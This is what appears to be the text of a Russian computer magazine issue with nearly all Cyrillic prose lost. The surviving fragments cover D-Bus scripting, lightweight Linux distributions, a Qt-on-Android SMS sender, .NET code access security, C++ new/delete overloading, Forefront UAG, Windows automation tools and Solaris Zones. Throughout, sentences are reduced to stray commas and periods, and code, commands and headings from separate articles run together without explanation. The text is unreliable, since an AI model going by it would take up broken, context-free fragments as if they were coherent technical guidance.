/Player org.freedesktop.MediaPlayer.VolumeSet

0100. 0 , 100 . :
$ qdbus org.kde.amarok /Player VolumeSet 90

VolumeGet.
, Amarok2 Last.FM,
Stop Play.
:
#!/bin/bash


?

D-Bus
Linux-.

, ,
. ,
D-Bus.
yakuake ( KDE,
<F12>) :

-Bus

$ qdbus org.kde.yakuake
/KDebug
/Konsole
/MainApplication
/Sessions
/Sessions/1
/yakuake
/yakuake/MainWindow_1
/yakuake/sessions
/yakuake/tabs
/yakuake/window

org.kde.yakuake.
, , ,
. :
qdbus

:
$ qdbus org.kde.yakuake /yakuake/tabs

,

. KDE DCOP (Desktop COmmunication Protocol),
D-Bus. DCOP
CORBA, SOAP XML-RPC.
CORBA , SOAP XML-RPC
-.

qdbusviewer
/yakuake/tabs.
, setTabTitle() .

. ,
/yakuake/sessions:
$ qdbus org.kde.yakuake /yakuake/sessions

()
activeSessionId(). (
yakuake ), :
$ qdbus org.kde.yakuake /yakuake/sessions \
activeSessionId

:
qdbus

, :


Kopete
, Kopete:
$ dbus-send --type=method_call --dest=org.kde.kopete \
--print-reply /Kopete org.kde.Kopete.contacts
:
$ dbus-send --session --type=method_call \
--dest=org.kde.kopete \
/Kopete org.kde.Kopete.disconnectAll

D-Bus
:
$ dbus-send --dest=org.kde.ksmserver /KSMServer \
org.kde.KSMServerInterface.saveCurrentSession
, :
$ qdbus org.kde.ksmserver /KSMServer logout 0 2 0
( root'):
$ dbus-send --system --dest=org.freedesktop.Hal \
--type=method_call --print-reply \
/org/freedesktop/Hal/devices/computer \
org.freedesktop.Hal.Device.SystemPowerManagement.Shutdown


#!/bin/bash
# Ask yakuake for the id of the active session, print it, then set the tab title
id=`qdbus org.kde.yakuake /yakuake/sessions activeSessionId`
echo $id
qdbus org.kde.yakuake /yakuake/sessions setTabTitle \
$id " "

. , ,
( )
:
#!/bin/bash
# Same as above, but the new tab title is taken from the first argument
id=`qdbus org.kde.yakuake /yakuake/sessions activeSessionId`
qdbus org.kde.yakuake /yakuake/sessions setTabTitle \
"$id" "$1"

D-Bus ,
qdbusviewer qt4-dev-tools,
D-Bus.
.
D-Bus, http://dbus.freedesktop.org/doc/dbus-tutorial.html. ! z


UNIXOID
Adept adeptg@gmail.com



. 7-10-
, .
,
, .
.

,
,
: ,
. .
,
:).
,
384
( CPU ,
400 ). ,
Firefox 384
.
, IM 512
1024 .
XXI :
: Intel Pentium-III 800 ;
: 128 SDRAM;
: 8
;
HDD: 20 .



,
,
. ,
, .
.

DE .
,
DSL (Damn Small Linux).
, .

2.4 .

: xubuntu (
-) lubuntu. Xubuntu Ubuntu Xfce Gnome (Abiword+Gnumeric
Openoffice, Thunderbird Evolution,
). xubuntu

192 (
256 ).
, 128 ( )
xubuntu - ( Live) ,
. -
:). 681 ,
2 .
Ubuntu .
Lubuntu
Ubuntu LXDE Gnome .
OpenOffice
Abiword+Gnumeric, Firefox
Chromium ( , Xubuntu
).
beta,
2010 ( Ubuntu 10.10). Lubuntu
,
-

Antix

128 ( Live-,
). 521 ,
1,5 .
Antix
SimplyMEPIS
Debian Testing.
PII 266 64 ( 128 ). ,
128 . : full
(485 ) base (264 ). full- 1,5 . 8.5,
. DE IceWM ( fluxbox,
wmii dwm ).
,
.
( debian-multimedia)
.

puppy ( top10 distrowatch).
Lucid Puppy 5.0
( Ubuntu Lucid Lynx), 4.x (
4.3.1)
4.4. ISO 5.0.1 130 ,
500 . ,
: abiword,
sylpheed, inkscape, gxine ( ), geany
.
, (
:)).
PuppyBrowser, Firefox. ,
,
(, ).
128 ,
Live-, swap.
C
JWM. puppy LiveCD
.
Slitaz . 1.0
2008. ,
3.0. ISO: 30 (, DSL!).
( 1,5 ).
Openbox, LXPanel.
30- LiveCD Firefox, gFTP,
transmission, mplayer, leafpad
. HTTP (lighttpd) SSH

LXDE + Ubuntu = Lubuntu

(dropbear) . ,
(, , ).
LiveCD 192 , 128
. ,
, LiveCD:
slitaz-loram ( 80 ) slitazloram-cdrom ( 16 ).
Tiny Core Linux .
10- .
FLWM FLTK. ,
: , - .
. , ,
cfdisk, , grub.
Tiny core 64 . ,
. . ,
.

, .

HAND MADE

. :
DE
. , :).
DE LXDE Enlightenment (,
Xfce ) LXDE
. , Ubuntu LXDE :
$ sudo apt-get install lxde

, lubuntu (, - lubuntu
ppa-). Enlightenment
Ubuntu ( 10.04 E16, 10.10
E16, E17) :
$ sudo apt-get install e16

$ sudo apt-get install e17

DE

DVD
dvd


:
tiny core, slitaz, puppy.

INFO

info
avahi

zeroconf,


.
kerneloops-daemon ,


kernel oops'


kerneloops.org.

HTTP://WWW
links
www.xubuntu.org
lubuntu.net
antix.mepis.org
puppylinux.org
tinycorelinux.com
www.slitaz.org


UNIXOID

Puppy LinuxPreload



conky. (
),
. :
$ sudo apt-get install conky

~/.conkyrc. , .conkyrc
. .conkyrc
: http://conky.sourceforge.net/screenshots.
html.

GDM. ,
.
:
;
;
;
;
, ,
.



. :
metacity, compiz kwin openbox, fluxbox, IceWM JWM. openbox - , (ObConf) :). ,
, openbox .
- . ,
( , ),
,
. , ,
, . , DE
: gnome-session, lxsession, xfce-session.
staybox,
openbox ( *box ). ,
, . , , lxsession
( LXDE). Openbox , ,


,
. , , ,
: tint2, pypanel, fbpanel, lxpanel .
: , , , , .
LXPanel. : (
, , ),
( , Gnome ),
.
, ( )
( iDesk,
http://idesk.sourceforge.net), .

. :
pcmanfm, thunar, rox-filer, emelfm2, xfe, gentoo (
:)). pcmanfm ,
, ( ), , .

.
Gnome-terminal - : terminator, termit,
lxterminal, sakura. :
UTF8 . lxterminal.
, .
, , dillo, midory arora

: . chromium.
(
, , nano mc). leafpad
, abiword odt doc, gnumeric ods xls.
geany.
Eye
of GNOME, , ,
: geeqie ( gqview), ristretto, mirage
. geeqie.
network-manager wicd, file-roller xarchiver,
. ,
gdm.
- , , slim (Simple Login
Manager) .


. .
. Ubuntu, , , . , :

Slitaz

10

?

.
, . ,
.
,
.
framebuffer' ,
gpm .
:
: lynx ( ), w3m (
, cookie ), links ( 2 framebuffer);
: mutt, alpine;
IM: finch ( , Pidgin),
CenterIM ( . 5.0
libpurple), irssi (IRC-), mcabber (jabber);
RSS-: newsbeuter, snownews;
: fbi ( fbgs ,
PDF PostScript), fbv, zgv;
: ogg123, mpg123, mpg321, mpd, moc,
mp3blaster;
: mplayer, vlc.

$ sudo apt-get install slim openbox obconf lxpanel \


pcmanfm lxterminal chromium-browser leafpad \
abiword gnumeric geany geeqie wicd xarchiver

, login manager .
slim.
apt-get,
, , avahi-daemon kerneloops-daemon. Sane
cups ( , )

:
$ sudo /etc/init.d/cups stop
$ sudo update-rc.d -f cups remove

. login manager . Slim


( <F1> ),

- :
openbox . lxsession
~/.xsession:
$ nano ~/.xsession
lxsession -session default

lxsession , ,
/etc/xdg/lxsession/default/desktop.conf :
$ sudo nano /etc/xdg/lxsession/default/desktop.conf
[Session]
window_manager=openbox-session

, lxsession ,
/etc/xdg/lxsession/default/autostart:
$ sudo nano /etc/xdg/lxsession/default/autostart
@lxpanel
@pcmanfm --desktop

@ , lxsession .
'--desktop' , (
) pcmanfm. ,
, GUI:
$ pcmanfm --desktop-pref

.config/pcmanfm/pcmanfm.conf.
pcmanfm
.
lxterminal openbox gnome-terminal,
:
$ sudo update-alternatives --config x-terminal-emulator

lxterminal .

,
, , ,
, . ,
. z


CODING
RankoR ax-soft.ru

SMS-

ANDROID

OS Android , , , ,
Qt. ,
, ,
SDK Java. Trolltech
Nokia .

NDK C++, , ,
, Qt Android.
- ( ) . , ,
.

, .
Java NDK , .so. Java,
, ,
Qt. Android Java-, , ,
.

QT

Wiki (. ),
, -
.
Ubuntu 10.04,
, , .


, ,
( , ?).
, :
SDK. :
wget http://android-lighthouse.googlecode.com/files/qadk-1.x-2.x-rtti-exceptions.tar.lzma
tar xvfa qadk-1.x-2.x-rtti-exceptions.tar.lzma

Lighthouse:
git clone git://gitorious.org/~taipan/qt/androidlighthouse.git

mkspecs/android-g++/qmake.conf.
NDK_ROOT ANDROID_PLATFORM ( /data/local/qt
android-5 ).
.
androidconfig.sh. shared
static ( ).
, (./androidconfig.sh) (make -j X, X
).

>> coding

DVD
dvd

.

Qt logo

http QHttp
done() readyRead().
GET- :

? - ! ,
, Ubuntu make ,
OpenGL.
,
,
OpenGL.
make -j X , ,
Android
, =).

Qt Creator, GUI-.
(, .pro)
. :
TEMPLATE = lib
CONFIG += dll
Qt Creator
() qmake /data/local/
qt/bin/qmake.
,
.
, ,
?
. smste.ru, .
, , Wireshark.
:
1. GET ,
input (, hidden),
.
2.
.
3. POST- .
HTTP- Qt QHttp.
, QtNetwork (QT +=
network) !
( )
.

http.setHost("smste.ru");
http.get("/");

done(), ,

(, Wi-Fi).
onHttpReadyRead(const QHttpResponseHeader
&resp):

HTTP://WWW
links
http://code.google.com/p/android-lighthouse Qt for
Android .
http://developer.android.com/sdk/index.html Android
SDK, must have!

QString str(http.readAll());
qint32 index=str.indexOf("value=\"code")+7;
if ( index != 6 )
codeMod = str.mid(index,
str.indexOf("\" />", index) - index);

(hidden)
codeMod . :
QString cookieStr;
for ( qint8 i = 0;
i < resp.values().count(); i++ )
{
if ( resp.values().at(i).first ==
"Set-Cookie" )
cookieStr.append(
resp.values().at(i).second+'\n');
}
cookies = QNetworkCookie::parseCookies(
cookieStr.toAscii());

, , , , ,
. cookies QList QNetworkCookie.
qint32 index =
str.indexOf("<image>/pix/") + 12;
image = str.mid(
index,str.indexOf(".jpg") - index
);
QHttpRequestHeader header = createHeader(
"GET",QString("/pix/%1.jpg").arg(image)
);
http.request(header);

INFO

info


.
,
?

WARNING
warning
,
?
,

, QtWebkit
Phonon,


LGPL.

(
) JPEG.


CODING

HTTP-
QHttpRequestHeader MainWidget::createHeader(
const QString &method,
const QString &path
)
{
QHttpRequestHeader header(method, path);
header.addValue("Host", "smste.ru");
header.addValue("Connection", "keep-alive");
header.addValue("User-Agent", "Mozilla/5.0");
header.addValue("Referer", "http://smste.ru");
header.addValue("Accept", "*/*");
QString cookie;
for ( qint8 i = 0; i < cookies.length(); i++ )
cookie += ( cookies.at(i).toRawForm(
QNetworkCookie::NameAndValueOnly) + "; ");
header.addValue("Cookie", cookie);
return header;
}


createHeader()
HTTP- (, ,
).
,
:
QHttpRequestHeader header = createHeader("POST", "/");
header.addValue("", QString("number=%1&message=%2&sign=ax-soft.ru"
"&event=%3&codemod=%4&%5=%6")
.arg(ui->numberLE->text())
.arg(ui->textPTE->toPlainText())
.arg(image).arg(codeMod).arg(codeMod)
.arg(ui->captchaLE->text()));
qDebug() << header.toString();
http.request(header);

! Build All, .apk- :).


:
if ( resp.value("Content-Type") == "image/jpeg") {
ui->captchaLb->setPixmap(QPixmap::
fromImage(QImage::fromData(
http.readAll())));
return;
}

, .
,
, ,
ui->numberLE. :
void MainWidget::on_numberLE_editingFinished()
{
if ( ui->numberLE->text().length() != 11 )
return;
QHttpRequestHeader header = createHeader(
"GET",
QString("/netxml.php?number=%1&rnd=94728").
arg(ui->numberLE->text()));
http.request(header);
}


. , , Java Runtime Environment?


, , . , .apk ant. sudo apt-get install ant.
tools Android SDK ./
android. .
API ( ,
8), Virtual
Devices, New. Name , Target Android 2.2,
Skin ( WVGA800), Create AVD.
Start, Launch. , .
,
1,5-2 . , ( ARM QEMU).
, ,
100% .
Android, .

tools Android SDK ( ).


, . : ./android create project.
, ! , . , , : . API,

>> coding

SUCCESSFUL,
.

, , Activity
. :
./android create project --target 8 --name hello \
--path ./TestPro --activity helloActivity --package \
com.example.hello

ls , TestPro. ,
ls. libs armeabi. Qt
(.so).
src/ androidlighthouse/src/android/java/com, src/com/nokia/
qt. src/com/example/hello/
Activity helloActivity.java. onCreate,
:

- ( 2007, 2008) (Motorola


A1200e, Linux, , , ,
Qt 2) QTopia, Qt
Embedded Trolltech Linux Kernel 2.6
Qt 4, .
motofan, 2.4 ( A1200
, ). , ,

, !
, Qt 4.5 (
, , Maemo).
Android, . ,
, Qt Mobility,
Nokia. , , (,
?). , Qt
iOS (, , ),
, Qt Software .
Qt Everywhere!

THANKS TO:

taipanromania ( ) marflon
(, , ][) .apk, , , -3-1 ( ) . z

qt

public helloActivity()
{
setApplication("Hello");
}

Hello . , .so
libHello.so.
, , ant
install. (, .
, 12.5 ). ,

CODING
stannic.man@gmail.com


,
.
,
, ? , ,
? ?

.NET ,
C# .

, . , ( )
.
.
(common language runtime, CLR)
.NET Framework ,
,
. ,
(principal-based security), CLR , , , ,
.
(code access security) , ,
(trusted user) ,


.
System.Security. , ...
, , , ,
.NET
. System.Security
. :).

, ( ) . , : .

CLR?

(common language runtime, CLR)


Microsoft .NET Framework
evidence-based security.
. ,
, ,
, ,
, ,

>> coding

,
.
:
(evidence-based security)
, ;
(code access security)
, - .

.
,
, , .
- ,
.
(custom) . ,
,
, .
.
.NET Framework (Mscorcfg.msc).

: ,
. , , - , ,
. ,
,
,
, .
, ,
. ,
.

,
, , , .

IHRE AUSWEISS, BITTE!


, ( ) ,
,
. .NET Framework
(, Microsoft Internet Explorer). :
(, C:\app.exe)
. ,
,
,
. ,
, , ,
. , ,


Mscorcfg.msc
Windows, , UAC, DEP, ,
.
(, http://www.microsoft.com).

,
. ,

,
:
WebPermission ,
;
FileDialogPermission , ;
IsolatedStorageFilePermission ,
-;
UIPermission
.
( \\UNC\share).
,
, , :
FileIOPermission
, ;
WebPermission , ;
DNSPermission DNS-
IP-;

DVD
dvd

,
C#
, .

HTTP://WWW
links
blogs.msdn.com, www.eggheadcafe.com, bytes.com


.NET


CODING

FileDialogPermission , ;
IsolatedStorageFilePermission ( );
UIPermission
.
,
.
. ,
: , -, .
,
. ,
, .
, , , .

. :
, ,
, , ,
. .
, ,
. , ,
DLL, ,
, ,
, , .
,
(, ,
) , .
,
:
,
( ). . , -
, -,
, . ,
protected , .
( ).
, .
. InheritanceDemand

:
;
, .


GuiCaspol

?
.NET Framework
, .
, , . , ,
. :
[Security Permission]:
Unmanaged Code , ;
Skip Verification ;
ControlEvidence
;
ControlPolicy ;
SerializationFormatter ;
ControlPrincipal
;
ControlThread ,
;
[ReflectionPermission]:
MemberAccess ( ).


, , .
1. sn -k .
, (strong
name), .
, .
sn -k keypair.dat
csc /r:App1.dll /a.keyfile:keypair.dat App1.cs
sn -p keypair.dat public.dat
sn -tp public.dat >publichex.txt
[StrongNameIdentityPermissionAttribute(SecurityAction.LinkDemand,
PublicKey="...hex...", Name="App1", Version="0.0.0.0")]
public class MyClass

2. csc App1,
.
3. sn .
4. . (custom attribute)

, sn, PublicKey.

>> coding


5. Appl
MyClass.
API-
LinkDemand.
, , ( ). ,
, .
. , ,
(link demands) .
[System.Security.Permissions.PermissionSetAttribute(
System.Security.Permissions.SecurityAction.InheritanceDemand,
Name="FullTrust")]
[System.Security.Permissions.PermissionSetAttribute(
System.Security.Permissions.SecurityAction.LinkDemand,
Name="FullTrust")]
public class YourClass{...}

.
, , ,
, . :
[assembly:FileIOPermissionAttribute(
SecurityAction.RequestMinimum,
Write="C:\\test.tmp")]
[assembly:PermissionSet(
SecurityAction.RequestOptional, Unrestricted=false)]
... SecurityAction.RequestRefused ...

, ,
C:\test.tmp.
, PolicyException, .
, ,
- .
, ,
. ,
.
, , -
, , ,
. , , , . , ,
.
.

!
.
, , . , ,
.
, !z


CODING
deeonis deeonis@gmail.com

C++

C++.

new delete. ,
C++
.
,
new delete ,
. new
.
, , ,
- .
, new delete
C++ .
- new.
. , new

. ,
. ,
.

. , C++
.
.
, new:
new
void *operator new(std::size_t size)
throw(std::bad_alloc)
{
using namespace std;
// 0 ,
// , 1
if (size == 0)
size = 1;
while(true)
{
// size ;


new

new . . - ,
bad_alloc.
, . new
-,
. ,
. ,
, . , - ,
,
. ,


if ( )
return ( );
//
// , -
new_handler globalHandler = set_new_handler(0);
set_new_handler(globalHandler);
if (globalHandler)
(*globalHandler) ();
else
throw std::bad_alloc();
}
}


, . , , .
, ,
0 , .
, .
new . ,
-. , ,
, bad_alloc.
, new
-.
, :
, ,
bad_alloc, ,
. ,
new, .
, new - .

. , new Base
sizeof(Base) , .
, , Base?

new, Base. (
Derived), , :
sizeof(Derived) != sizeof(Base). -
new . , ,
.
new
class Base {
public:
static void *operator new (std::size_t size)
throw(std::bad_alloc);
...
};
// new
class Derived: public Base
{...};
// Base::operator new
Derived *p = new Derived;

, .
, new, .
Base,
new. ,
.
new
void *operator new (std::size_t size)
throw(std::bad_alloc)
{
// size , new

if(size != sizeof(Base))
return ::operator new(size);
//
...
}

new
(operator new[]). ,
. - . ,
, ,
, new[]. (
)/sizeof(Base). ,
, ,
.


delete

delete, .
, . delete
:

delete
void operator delete (void *rawMemory) throw()
{
// ,
if(rawMemory == 0) return;
// ,
rawMemory;
}

delete - , ,
new,
. new Base
sizeof(Base) , delete
. , ,
,
delete.
- delete
class Base {
public:
static void *operator new (std::size_t size)
throw(std::bad_alloc);
static void operator delete
(void *rawMemory, std::size_t size) throw();
...
};
void Base::operator delete (void *rawMemory,
std::size_t size) throw()
{


// ,
if(rawMemory == 0) return;
if (size != sizeof(Base)) {
::operator delete(rawMemory);
return;
}
// ,
rawMemory;
}

new
delete

operator new, ,
new .
void*.
, new :
void *operator new(std::size_t, void *pMemory).
new
.
delete

.
,
- .
: widget *pw = new Widget. .
new,
Widget, .
, ,
, *pw . !
. ,
C++. delete
.
, . C++ delete,
new,
. new
delete, , new
delete,

.

class Widget {
public:
...
static void *operator new(std::size_t size,
std::ostream& logStream) throw(std::bad_alloc);
static void operator delete(void *pMemory,
std::size_t size) throw();
...
};
Widget *pw = new (std::cerr) Widget;


delete
, new . operator
delete C++.
:

class Widget {
public:
...
static void *operator new(std::size_t size,
std::ostream& logStream)
throw(std::bad_alloc);
static void operator delete(void *pMemory,
std::size_t size)
throw();
static void operator delete(void *pMemory,
std::ostream& logStream)
throw();
...
};
Widget *pw = new (std::cerr) Widget;

,
delete.
, ,
.
.
- new,
.

class Base {
public:
static void *operator new (std::size_t size,
std::ostream& logStream)
throw(std::bad_alloc);

};
// ! new
Base *pb = new Base;
// , new Base
Base *pb = new (std::cerr) Base;

, -,
using-.

C++ ,
.
! z

SYN/ACK
grinder grinder@synack.ru


FOREFRONT UAG
. ,
, .
Forefront UAG
.
FOREFRONT UAG
Forefront Unified Access Gateway (UAG)

.

, Microsoft,
. Intelligent
Application Gateway (IAG 2007),
UAG, , : Remote Desktop Services, SharePoint Exchange (Outlook Web
App Anywhere), Dynamics CRM, Citrix XenApp,
.
,
: , , ,
..
UAG, NAP, NPS- (. NAP & NPS).
UAG :
(publishing server) ;
DirectAccess
; VPN,
, ;
( ),
.
, UAG ,
DirectAccess. , ,
, Win2k3 ,
-Windows .
. DirectAccess
Win7 Win2k8R2, UAG SSL VPN
XP/Vista, *nix/Mac OS X . UAG
, , ,
.
NLB (Network Load Balancing) UAG,
(master), . UAG
NLB, Win2k8R2.
,


go.microsoft.com/fwlink/?LinkId=166184.

(trunks). ,
.
IP .
, Forefront UAG
,
. UAG : LDAP, RADIUS, TACACS, SSL, WINHTTP.
UAG (Single Sign-On)
, .
UAG
, Kerberos, NTLM, HTTP. . AD Active Directory Federation
Services (AD FS).
, UAG Forefront TMG (Threat
Management Gateway, ,
). , . , UAG
TMG.

FOREFRONT UAG
CPU 2,66+ , 8+ RAM
( 4
RAM), NIC 2+. Win2k8R2
Standard Enterprise. 64-, , , .
,
.
.
-, 120 .
, Uagver.exe ( ISO).
,

TechNet, , UAG.

Run Windows Update


.
Install Forefront UAG,
Setup Wizard. , ,
Next.
,
( Forefront).
,
TMG UAG. Forefront UAG
Management. Getting Started
Wizard, ,
. Configure Network Setup

. Unassigned Internal External
.
Define server Topology UAG (Single server) (Array member).
,
Single server. , , Join Microsoft
Update ,
Microsoft Update .
,
.

FOREFRONT UAG
.
, UAG, .
UAG ,
HTTP/HTTPS-
DirectAccess.
( ISA/TMG ),
, Outlook Web App, IIS, RDS,
Citrix XenApp .
HTTPS- Certificate Manager,
(
VPN, ][ 08.2008).
SSO Kerberos.
, ,
UAG ,
Admin.
. , Admin (Authentication and

Authorization Servers), NPS,


(Load Balancing), SSL
(SSL Protocol Settings), (File Access) .
: New Trunk
.
. Portal trunk,
UAG.
Active Directory, ADFS trunk. Publish Exchange applications via the portal
Exchange.
( ),
, ,
IP-/. HTTP-
HTTPS-,
. : , ,
Add, . , .
5 (Forefront UAG access policies) NAP ( NAP
). UAG ,
, .
,
. HTTPS-,
.
, ,
UAG. ,
.
.
Configure Trunk Configuration.
, ,
, URL, . ,
. Portal URL, URL,
(, ).
,
URL.
URL Inspection URL (POST, GET, PUT, DELETE ..),
POST/PUT, ,
URL.


SYN/ACK

Forefront UAG

Forefront UAG 2010 Best Practices


Analyzer Tool

URL Set, .
Accept
Reject (URL, , ).
Primary () Exclude (
Primary).
Global URL Settings ,
, URL Set.
UAG.
Add Application ,
. .
: Built-in services ( , -), Web
(Exchange, SharePoint, Dynamics CRM ..), Client/server and legacy,
Browser-embedded (Citrix XenApp), Terminal services (TS)/Remote
Desktop Services (RDS). , (. ).
.
, , .
TMG.
,
, TMG: , .

fwlink/?LinkId=169486).
AD,
, ,
DirectAccess.
(AutoEnrollment), .
Certification Authority, Manage > Certificate
Templates Workstation Authentication.
, DirectAccess, Autoenroll
Enroll. GPO
(DirectAccess IPsec Certificate AutoEnrollment), Computer
Configuration > Policies > Windows Settings > Security Settings
Public Key Policies > Certificate Services Client >
Autoenrollment.
Renew expired certificates Update certificates that use
certificate templates. Security Filtering ,
DirectAccess, ,
, .
DNS-.
, ][ 11.2009,
GPO DNS-
, DirectAccess.
Computer Configuration Policies Administrative Templates

DIRECTACCESS
DirectAccess
, UAG IAG 2007, . , Forefront UAG
DirectAccess prerequisites, ,
, . ,
,
,
IPv4- ( go.microsoft.com/

NAP & NPS

Network Access Protection , , .


Network Policy Server ,
RADIUS-, RADIUS- NAP.


, ,
UAG ,
,
.
. , , UAG. Forefront UAG 2010
Best Practices Analyzer (BPA) Tool,
Microsoft. , BPA ,
,
. , , BPA,
. Forefront TMG Forefront TMG BPA Tool.

INFO

info
Forefront
TMG

][
09.2009
NAP

][
12.2008


VPN ][
08.2008

Forefront UAG
Network, DNS Client Primary DNS Suffix, DNS-
. DirectAccess UAG.
DirectAccess
.
DirectAccess, .
.
, Active Directory,
,
DirectAccess.
,
. ,
Enable UAG DirectAccess NAT64
Enable UAG DirectAccess DNS64.
( HTTPS),
. , ,
Infrastructure Servers Configuration
,
.
DNS- .
, ,
.
Application Servers,
. Generate Policies,
, ,
Apply Now, .
, gpupdate /force.

.
,
, Admin
. Web Monitor ( 5002),

(, , ),
,
.
Activation Monitor,

UAG ,
, ,
.

, , UAG
.
. , ,
. , MS, . z



Forefront
UMG ,

Uagver.exe


,
UAG.

HTTP://WWW
links

Forefront
UMG www.
microsoft.com/
forefront/unifiedaccess-gateway

UAG, Forefront TMG


SYN/ACK



OC Windows
.
, . , , .
.
AUTOIT

AutoIt (autoitscript.com/autoit3),
, ,
GUI-.
AutoIt,
BASIC- . , Windows API DLL, , ,
(, , ), GUI, ,
, (MySQL SQLite),
HTML-, , -mail .
, . , AutoIt .
, .
, AutoIt
Windows. , AutoIt ,
.
Windows 95 2k8,
64- , UAC. ,
exe
.
.
AutoIt freeware-,
, . , -
. 3, , .
SciTE4AutoIt3,
AU3Check.exe, , Aut2Exe ( Exe2Aut) . *.au3
AutoIt.
, AutoIt
. . ,
, :
Run("calc.exe")


, . AutoIt
,
. ,
WinWaitActive,
. .
. ,
AutoIt AutoIt v3.3.6.1.5,
, :
WinWaitActive("AutoIt v3.3.6.1.5")

.
, ,
, :
WinWaitActive("AutoIt v3.3.6.1.5", "License Agreement")

.
:
Send("!y")

, .
AutoIt Window Info Tool (AU3Info.exe),
,
( ), , ,
. ,
Window Info Tool .

. AutoIt ,
.
.
. AutoIt ,
, ,
, .

XSTARTER

. ,
(xstarter.com/rus), , xStarter , .
xStarter ,

Windows.
,
, . , ,
,
. , . xStarter,

. ,
,
<Ctrl+D>, , Firefox.
,
. /
, , .
.
( ),

. . ,
,
, ,
,
.
.
.
, ,
.
, ,
, . .

xStartHooks. xStarter

, ,
.
(, NOD32) ,
xStarter .

exe-,

.
.
, Windows NT4
2k8/7.

, , SMS e-mail,
.
Starter Job Scheduler for
Firebird/Interbase, SQL-,
. ,
xStarter
Web Pilot.

AUTOMATE
, AutoMate,
Network Automation, Inc (networkautomation.com). GUI, .
Task Builder.

, .
AutoMate 7 230 ,
, ,
FTP/SFTP, PGP, , WMI .
AutoMate ,
: AutoMate Professional Premium,
AutoMateBPAServer 7 Standard Enterprise.
AutoMate Professional . Enterprise

, AD,
, SNMP,
telnet .
Win XP SP2 2k8/7. Microsoft .NET Framework 3.0.


SYN/ACK

AutoIt AutoIt Windows


Info
Task Builder Task Administrator. Task Builder .
: 29
.
, . , ,
. System > Get Volume Information,
, .

. General ,
: , , , . ,

AutoHotkey

AutoHotkey (autohotkey.com)
AutoIt v2. , ,
AutoIt , , 2003 Initial release.
, AutoHotkey
GNU GPL.
AutoIt v2,
v3. : , ,
. , ,
GUI.
.
AutoHotkey . , <Win+C>, :
#c::Run calc
# <Win>.
(
www.script-coding.info/AutoHotkeyTranslation.html),
. , GUI
SmartGUI Creator SciTE4AutoHotkey,
.
( *.ahk) exe .


xStarter ,

(All volumes) ,
, .
, ,
.
.
.
, , ,
, , .
Actions.
(Breakpoint,
<F8>).
, ,
, Task Administrator. , ,
. , ,
, , .
, .
*.aml.

Firefox
AutoIt

AutoItSetOption ( "WinTitleMatchMode", 2 )
AutoItSetOption ( "WinDetectHiddenText", 1 )
WinMinimizeAll ( )
Sleep ( 1000 )
Run ( "FirefoxSetup3.6.6.exe" )
WinWait ( " Mozilla Firefox" )
Send("{ENTER}")
WinWait ( " Mozilla Firefox", " ")
Send("{ENTER}")
WinWait ( " Mozilla Firefox", "" )
Send("{ENTER}")
WinWait ( " Mozilla Firefox", " " )
Send("{ENTER}")
Exit

INFO

info


Win2k8R2
Se7en.

AutoMate
,
NASA, IBM, Intel,
Verizon, Kaiser,
Safeway Stores
.

HTTP://WWW
AutoMate 7
AUTOMATION ANYWHERE
Tethys Solutions,
LLC (automationanywhere.com)
-. Automation Anywhere

,
, , . ,
.
, ,

links
AutoIt
autoitscript.com/autoit3
AutoMate
networkautomation.com

xStarter xstarter.com/rus

Automation Anywhere
automationanywhere.com
AutoIt www.autoitscript.ru

Automation Anywhere


SYN/ACK

,
VBS JavaScript . ,
SMART Automation Technology, .
,
. , ,
. : Object Recorder
Web Recorder -. Web Recorder , : Java, JavaScript,
AJAX, Flash, . : Automation

Windows

Microsoft , , Vista, Task Scheduler (


, taskschd.msc) .
, ( )
. ,
(Triggers), (Actions), (Conditions) (Settings). ,
:
, , , .
, ,
.
,
, ( ,
).
,
(, ). , , .

Win2k8


AutoHotkey

Anywhere, ,
. <Alt+Ctrl+S> Stop
. ( *.atmn). ,
Task Editor.
, .
.
Edit,
( , ).

, , . : ,
, Excel, ,
e-mail, , /
.
.
, (
).
, ,
.

.
, Trigger Manager,
: ,
, (CPU, , ),
/ , e-mail.
Automation Anywhere
.
, , , , . Automation Anywhere Windows:
XP 2k8/7.


.
,
. , ,
xStarter, AutoIt
AutoHotkey. z

j1m@synack.ru


OPENSOLARIS
Solaris UNIX.
ZFS, DTrace Zones
,
.
, Solaris Zones.

1999 FreeBSD Jail,
. chroot,
. Jail , . ,
, Solaris Zones,
Jail,
.
Solaris Zones ,
.
, , , ,
.. ,
,
Zones ,
:
, () .
Zones ,
Solaris ( Linux).
:
,
, .
Solaris 10 ( ),
0 global.
, ,

. (init),
. (
) ,
, .


.
IP-, ,
.. ( )

, .
Solaris OpenSolaris
.
BrandZ (, ,
Solaris Containers for Linux Applications), , API, , .. , BrandZ
Linux, Solaris 8, Solaris 9 Solaris 10 ( Solaris 10
OpenSolaris).
.


:
Configured .
Installed .
Ready . , : ,
, ,
ID. .
Running .
init.
Incomplete , . ,
.
Shutting down .
Down .
, ,
. .

, .

/zones, ZFS:


SYN/ACK

# zfs create -o mountpoint=/zones rpool/zones

, :
# zfs create rpool/zones/myzone
# zfs set quota=3g rpool/zones/myzone

.
, create:
zonecfg:apache> create

:
zonecfg:apache> set zonepath=/zones/apache


.
.
mkfile:
# mkdir /zones
# mkfile 3g /zones/myzone.img

:
# mkdir /zones/myzone
# lofiadm -a /zones/myzone.img /dev/lofi/1
# newfs /dev/rlofi/1
# mount /dev/lofi/1 /zones/myzone
# chmod go-rwx /zones/myzone



.
Apache .
ZFS:

, :
zonecfg:apache> set autoboot=true

192.168.0.1 pcn0:
zonecfg:apache> add net
zonecfg:apache:net> set address=192.168.0.2/24
zonecfg:apache:net> set physical=pcn0
zonecfg:apache:net> end

/opt ,
:
zonecfg:apache> add inherit-pkg-dir
zonecfg:apache:inherit-pkg-dir> set dir=/opt
zonecfg:apache:inherit-pkg-dir> end

:
zonecfg:apache> info

# zfs create -o mountpoint=/zones rpool/zones
# zfs create rpool/zones/apache
# zfs set quota=1g rpool/zones/apache
# chmod 700 /zones/apache
# zfs list

,
.
Configured. zonecfg:
# zonecfg -z apache


, :
zonecfg:apache> verify
zonecfg:apache> commit
zonecfg:apache> exit

.
, zonecfg ,
:


1. /usr/local /opt/local

( type=lofs, ,
loopback fs):
zonecfg:myzone> add fs
zonecfg:myzone:fs> set dir=/usr/local
zonecfg:myzone:fs> set special=/opt/local
zonecfg:myzone:fs> set type=lofs
zonecfg:myzone:fs> add options [ro,nodevices]
zonecfg:myzone:fs> end

/lib,
/platform, /sbin /usr, .
2. /dev/dsk/c0t0d0s7
UFS /mnt:
zonecfg:myzone:fs> set dir=/mnt
